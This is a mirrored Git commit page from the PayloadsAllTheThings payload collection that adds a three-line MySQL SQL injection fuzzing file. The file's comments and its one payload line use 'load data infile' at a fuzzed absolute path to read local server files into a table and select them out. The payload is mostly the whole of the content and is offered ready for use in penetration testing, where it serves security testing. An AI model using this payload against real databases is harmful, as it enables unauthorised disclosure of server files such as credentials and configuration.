mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-31 15:05:34 -08:00
Architecture - Files/Intruder/Images and README + template
This commit is contained in:
3
SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
3
SQL injection/Intruder/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
@@ -0,0 +1,3 @@
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user